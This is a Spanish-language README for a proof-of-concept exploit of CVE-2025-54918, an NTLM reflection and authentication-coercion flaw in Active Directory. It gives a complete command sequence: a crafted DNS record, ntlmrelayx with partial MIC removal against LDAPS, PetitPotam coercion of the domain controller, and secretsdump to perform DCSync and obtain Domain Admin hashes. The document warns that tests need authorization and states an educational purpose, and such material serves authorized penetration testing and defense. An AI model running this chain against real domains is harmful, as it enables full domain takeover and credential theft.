
POC para CVE-2025-54918 y una demostración técnica.
IMPORTANTE:
Para probar CVE-2025-54918, debe crear un registro DNS en el entorno de Active Directory de destino.
Siempre consulte con el cliente y obtenga autorización explícita antes de realizar pruebas, ya que esto puede afectar el comportamiento de DNS y autenticación en entornos de producción.
Este repositorio contiene una Prueba de Concepto técnica que demuestra cómo un usuario de dominio con privilegios bajos puede escalar a acceso de nivel de Administrador de Dominio abusando de reflexión NTLM combinada con coerción de autenticación.
Nota: el CVE es explotable incluso con signing configurado en True, que es el valor predeterminado para un controlador de dominio. Además, la corrección de CVE-2025–54918 fue para windows 2025, y CVE-2025–33073 corrigió (no intencionadamente) para windows 2022.
Un desglose más técnico está disponible en mi página de Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
192.168.140.150 (Signing está en True, que es el valor predeterminado para un controlador de dominio)192.168.140.135nahya.localtest Usuario de dominio válido (sin privilegios DCSync)Clone los repositorios necesarios:
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
Verifique que el usuario no pueda realizar DCSync antes de la explotación:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

Cree un registro DNS usando el nombre NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA que resuelva a la IP del atacante.
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

Ejecute ntlmrelayx con eliminación parcial de MIC y escalado LDAP habilitado:
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

Fuerce al Controlador de Dominio a autenticarse en el registro DNS controlado por el atacante usando una técnica de coerción (PetitPotam):
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

Vuelva a ejecutar secretsdump para confirmar la escalada de privilegios:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ Resultado esperado: DCSync exitoso y obtención de hashes de Administrador de Dominio

En este punto, el atacante ha:
Consulte el artículo de Medium para una explicación detallada de la vulnerabilidad y la cadena de ataque.
Este trabajo no habría sido posible sin:
impacket-partial-micAnalizando la Vulnerabilidad de Bypass de Autenticación NTLM y LDAP – Blog de CrowdStrike
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
Aviso de Seguridad de Microsoft – CVE-2025-54918 – Guía de Actualización de MSRC
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
Esta Prueba de Concepto se proporciona solo con fines educativos y de pruebas de seguridad autorizadas.